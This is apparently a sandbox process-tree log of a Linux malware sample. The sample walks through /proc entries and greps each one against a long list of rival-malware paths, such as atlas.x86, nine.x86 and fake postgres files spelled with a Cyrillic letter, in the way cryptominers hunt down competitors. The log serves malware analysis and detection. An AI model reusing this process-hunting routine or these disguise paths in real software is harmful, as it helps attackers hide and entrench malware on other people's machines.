/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:832
-
-
/bin/grepgrep exe2⤵PID:835
-
-
/bin/lsls -latrh /proc/202⤵PID:834
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:837
-
-
/bin/grepgrep exe2⤵PID:840
-
-
/bin/lsls -latrh /proc/212⤵PID:839
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:842
-
-
/bin/grepgrep exe2⤵PID:845
-
-
/bin/lsls -latrh /proc/222⤵PID:844
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:847
-
-
/bin/grepgrep exe2⤵PID:850
-
-
/bin/lsls -latrh /proc/232⤵PID:849
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:852
-
-
/bin/grepgrep exe2⤵PID:855
-
-
/bin/lsls -latrh /proc/242⤵PID:854
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:857
-
-
/bin/grepgrep exe2⤵PID:860
-
-
/bin/lsls -latrh /proc/2502⤵PID:859
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:862
-
-
/bin/grepgrep exe2⤵PID:865
-
-
/bin/lsls -latrh /proc/32⤵PID:864
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:867
-
-
/bin/grepgrep exe2⤵PID:870
-
-
/bin/lsls -latrh /proc/3322⤵PID:869
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:872
-
-
/bin/grepgrep exe2⤵PID:875
-
-
/bin/lsls -latrh /proc/3332⤵PID:874
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:877
-
-
/bin/grepgrep exe2⤵PID:880
-
-
/bin/lsls -latrh /proc/3372⤵PID:879
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:882
-
-
/bin/grepgrep exe2⤵PID:885
-
-
/bin/lsls -latrh /proc/362⤵PID:884
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:887
-
-
/bin/grepgrep exe2⤵PID:890
-
-
/bin/lsls -latrh /proc/3612⤵PID:889
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:892
-
-
/bin/grepgrep exe2⤵PID:895
-
-
/bin/lsls -latrh /proc/3622⤵PID:894
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:897
-
-
/bin/grepgrep exe2⤵PID:900
-
-
/bin/lsls -latrh /proc/372⤵PID:899
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:902
-
-
/bin/grepgrep exe2⤵PID:906
-
-
/bin/lsls -latrh /proc/3722⤵PID:905
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:909
-
-
/bin/grepgrep exe2⤵PID:912
-
-
/bin/lsls -latrh /proc/3732⤵PID:911
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:915
-
-
/bin/grepgrep exe2⤵PID:919
-
-
/bin/lsls -latrh /proc/3802⤵PID:918
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:922
-
-
/bin/grepgrep exe2⤵PID:925
-
-
/bin/lsls -latrh /proc/42⤵PID:924
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:928
-
-
/bin/grepgrep exe2⤵PID:932
-
-
/bin/lsls -latrh /proc/4242⤵PID:931
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:935
-
-
/bin/grepgrep exe2⤵PID:938
-
-
/bin/lsls -latrh /proc/52⤵PID:937
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:942
-
-
/bin/grepgrep exe2⤵PID:945
-
-
/bin/lsls -latrh /proc/62⤵PID:944
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:948
-
-
/bin/grepgrep exe2⤵PID:952
-
-
/bin/lsls -latrh /proc/6672⤵PID:951
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:954
-
-
/bin/grepgrep exe2⤵PID:958
-
-
/bin/lsls -latrh /proc/6712⤵PID:957
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:961
-
-
/bin/grepgrep exe2⤵PID:965
-
-
/bin/lsls -latrh /proc/6722⤵PID:964
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:968
-
-
/bin/grepgrep exe2⤵PID:971
-
-
/bin/lsls -latrh /proc/6772⤵PID:970
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:975
-
-
/bin/grepgrep exe2⤵PID:978
-
-
/bin/lsls -latrh /proc/6782⤵PID:977
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:981
-
-
/bin/grepgrep exe2⤵PID:985
-
-
/bin/lsls -latrh /proc/6952⤵PID:984
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:987
-
-
/bin/grepgrep exe2⤵PID:991
-
-
/bin/lsls -latrh /proc/6962⤵PID:990
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:994
-
-
/bin/grepgrep exe2⤵PID:998
-
-
/bin/lsls -latrh /proc/72⤵PID:997
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1001
-
-
/bin/grepgrep exe2⤵PID:1005
-
-
/bin/lsls -latrh /proc/702⤵PID:1004
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1008
-
-
/bin/grepgrep exe2⤵PID:1012
-
-
/bin/lsls -latrh /proc/7002⤵PID:1011
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1015
-
-
/bin/grepgrep exe2⤵PID:1018
-
-
/bin/lsls -latrh /proc/7012⤵PID:1017
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1021
-
-
/bin/grepgrep exe2⤵PID:1026
-
-
/bin/lsls -latrh /proc/7022⤵PID:1025
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1029
-
-
/bin/grepgrep exe2⤵PID:1032
-
-
/bin/lsls -latrh /proc/7032⤵PID:1031
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1035
-
-
/bin/lsls -latrh /proc/7062⤵PID:1039
-
-
/bin/grepgrep exe2⤵PID:1040
-
-
